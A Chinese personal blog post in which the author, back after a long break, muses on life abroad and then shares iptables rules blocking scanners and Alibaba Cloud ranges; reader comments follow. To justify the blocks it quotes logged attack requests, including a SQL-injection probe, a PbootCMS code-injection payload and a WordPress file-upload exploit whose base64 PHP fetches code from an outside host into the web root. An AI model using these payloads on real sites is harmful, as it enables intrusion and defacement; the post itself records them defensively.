Gojira 哥斯拉Gojira 哥斯拉

哥斯拉爱好者的日常
生活相当无趣 我得找点乐子

2025春节终于过完了 手动封ip-1

想好了的是假象,认真的做了也没前途。

2025年02月17日 星期一 农历二〇二五年正月二十日 [蛇年] 阳历乙巳年戊寅月丁巳日 水瓶座

超过一年半多没更新了,其实经常都想发博客,有几次想写了长篇想发出来,但最后还是按耐住了。
在万恶的资本主义待了有些年头(本次一年三个月)一些见闻一些感受,有时会有一些话想说出来,但感觉又会留下了“把柄”,免得以后给自己添麻烦。也怕一些人的一句:对对对,外国的月亮就是圆……55be4058
这能将我怼的“哑口无言”,毕竟经历不同、认知不同,很难沟通,更别想着服对方了。就如同过年的回去看到些小时的伙伴,却没什么话说一样。所以还是都作罢。

春期间手机基本全程关机,whatsapp、微信这些信息一条不回复(家人除外),这个春节过得不能用不好来形容了,只能算是完全无感,现在成为了叶开plus,从鼓励叶开、理解叶开、成为叶开、超越叶开的路上我越跑越顺……
说上面这句话其实心理负担还是挺重的,担心叶开兄弟瞎想,给他徒增烦恼,但我没一丁点恶意,也相信他不会误会的。

看了下留言,还有两位朋友(紫慕和叶开)记得我,给我送来了春节祝福,感受有点暖心。
他们也是我经常惦记的两位博友,叶开的博客我经常手动打开去看,关键是他的域名qq.md实在他妈的(惊叹、褒义)太好记了! 紫慕90zm.net则是通过蚁阅去看。顺带说一嘴,RSS阅读器我都懒得部署了,蚁阅用起来也挺方便的。

宣布个大消息,我的股票不亏了!盈利就不说了,看者心境不一。但还是要说,大癌真的能不入就不要入!上头了比吸毒还败家,远离它!贝莱德说得真的没错!另外,其实很多时候压榨、收割我们其实并不是所谓的外部势力。

手动封ip-1

近期有空看看web日志,发现采集、攻击太多了,最近这段时间开始了手动封ip,处理这些恶意流量后,总流量降低了至少90%,想着也将这些ip分享出来,总有人能用上的,反正我自己使用,贴出来一下也不费事,以后慢慢累积。

Linux中直接复制执行就可以了。

#2025-02-17
iptables -I INPUT -s 45.192.101.247 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 84.247.151.68 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 175.27.157.221 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 106.215.149.146 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 61.231.66.147 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 206.189.82.216 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 157.245.63.34 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 196.251.90.127 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 103.1.40.166 -p tcp -m multiport --dports 80,443 -j DROP

封这些ip一般有几个理由:恶意入侵请求、试探下载网站压缩包、采集。
恶意请求例如:

GET /viewthread.php?action=%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&tid=%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO))

POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9

POST /?tag/index=&tag=%7Bpbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&lnoc2tspfar1_ue

POST /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue

下面一段封禁了大概 30 多万个阿里云的ip,慎用,不过我自己是封了,它们的请求太多了,不知道是专业代理还是阿里搞的ai模型抓数据

#封阿里云的一大堆ip,频繁访问,目的不明。
iptables -I INPUT -s 47.100.0.0/14 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 101.132.0.0/16 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 106.14.0.0/15 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 139.196.0.0/16 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 139.224.0.0/16 -p tcp -m multiport --dports 80,443 -j DROP

每日分析日志再封禁弄起来确实费事,其实还有更简单的,装个waf就行了,只是个人不喜欢。

GOJIRA.NET原创文章未经允许不得转载! 当前页面:Gojira 哥斯拉 » 2025春节终于过完了 手动封ip-1

评论 18

  1. 这万恶的资本主义,又封口了一个喳男(曾经叽叽喳喳的男人)。

    小陈故事 L4 精英 2025.03.11 21:52:11 回复
    • 我还想做渣男(* ̄︶ ̄)

      高飞 博 主 2025.03.12 15:52:09 回复
  2. ipset了解下。

    石樱灯笼 L1 初出茅庐 2025.03.11 21:28:19 回复
    • 现在添加的ip都是零零散散的,用不到ipset了吧。
      其实主要是不怎么熟练 😄

      高飞 博 主 2025.03.12 15:55:30 回复
  3. 这么久没更新,原来出国了。咸鱼还不翻身的话,就煎焦了。
    我现在连RSS工具都没在用,都是人肉隔断时间就翻翻浏览器收藏夹。

    笛声 L3 知名人士 2025.03.03 07:23:17 回复
    • 还好没把我从收藏夹删掉。
      我早就焦了,不对,是碳化了。

      高飞 博 主 2025.03.11 11:13:43 回复
  4. 阿里在用机器人爬虫在采数据,上次好像也是频繁访问我的博客,太不礼貌了。

    怎么 VIP 贵宾 2025.02.18 19:49:07 回复
    • 你是不是使用了cdn?有时候能访问你的博客,大部分时候不能访问,大概意思是提示证书有问题,我估计能访问的时候是当时解析到的那个ip对应服务器上的证书没问题,其他的服务器有问题。
      但我让朋友访问,他却说正常。最近一年遇到好几次了。

      高飞 博 主 2025.03.11 11:42:16 回复
      • 我使用的是CDN只屏蔽了海外哇,或者你给我邮箱发一下你的IP。

        紫慕 VIP 贵宾 2025.03.14 22:43:51 回复
        • 怪不得啊,我刷了至少几十上百次 😂
          我的ip也是动态变化的。

          高飞 博 主 2025.03.17 10:04:14 回复
    • 它们爬也不申明他们是谁,冒充普通用户,很无耻,而且ip众多。

      高飞 博 主 2025.03.11 11:18:19 回复
  5. 我是用fail2ban配合自己手写的脚本写的土防火墙。一直觉得自己定制的才是最好的。

    大致 L4 精英 2025.02.18 13:02:17 回复
    • 我也是同感,觉得还是自己的好,其实累死,还想学学你的配合fail2ban来使用。
      我脚本加手动,累死,好处是可以经常看看有哪些攻击,以前是几年都不看一下。

      高飞 博 主 2025.03.11 11:20:06 回复
  6. 抱歉,刚刚太激动了,连文章都还没看完就留言了!现在是认真看完后,才想要回复的。

    一开始我还以为你只是没有更新到网站,毕竟你之前提到过这个情况。没想到原来是因为“万恶的资本主义”。但现在看到你终于更新了,心里真的感到特别高兴。看到这篇文章,许多回忆涌上心头,忍不住有些感伤。记得那时(凡哥、你和我)总是形影不离,彼此之间有那么多共同的时光。可是时光不留人,我们都在变。你停更了,凡哥也在结婚后开始专注自己的生活,我们也不像以前那样频繁出现在评论区了。

    很多事情确实都在变化,人的样貌、心态、甚至人际关系,现实中,我一直在深刻体会这些变化。可是我不希望看到你也像这样停下脚步。你是个慷慨又坚强的人,应该像哥斯拉一样勇敢地前行。这不是简单的鼓励,而是我对你一直以来坚持的深深敬意。

    在沈阳的那段时间,我也曾一度断绝了与现实的所有社交,只专注于博客更新。那时,我的生活看似简单,去公园散步,享受片刻的宁静。但其实,我知道那是在逃避,后来,生活中的一些打击让我不得不面对现实。当我回到家,面对我妈妈的病情,我也深刻感受到逃避是没有用的。每个人都会有属于自己的时刻,你也是,生活中的一切都只是暂时的,我相信你一定能找到自己的节奏,勇敢面对未来。

    你不必担心我会多想,真的很感谢你一直以来的关心和为我着想,这让我觉得特别温暖。

    如今,我也在继续迈出自己的步伐。我开始用AI来改变博客的风格和写作内容,虽然我并不知道这种改变是否对,但我知道,可能会让一些熟悉的朋友感到不适应。我自己也是在适应这个过程,但我希望能更真诚地表达我的内心感受。抱歉,给你带来了一些不安。

    叶开 SVIP 元老 2025.02.18 09:32:20 回复
    • 我还是有经常在本地写的。有时会一天写两三次,有时会两三天写一次,也算日均一次了。
      以后也想能更新回来,但也做不到以前那么频繁了,倒不是没东西写,只是太多不方便放上来,或者不好意思放上来。
      大部分人都在往好的方向发展,你也是,不知道现在工作找得怎样了?想在你博客问问,但无法留言。
      我的困境大多是因为自身的道德洁癖导致的,其实只要能转变下思想,算不上什么问题,对于很多人来说算不上屁事,但这种转变对我个人却很难,几乎不能做到,真是奇怪。

      高飞 博 主 2025.03.11 11:28:02 回复
  7. 我死去的记忆开始攻击我啦!!

    叶开 SVIP 元老 2025.02.18 09:16:03 回复
  8. 日更博主变年更博主啦

    dujun L3 知名人士 2025.02.17 20:08:21 回复
    • 我想变回来,但比较难

      高飞 博 主 2025.03.11 11:20:38 回复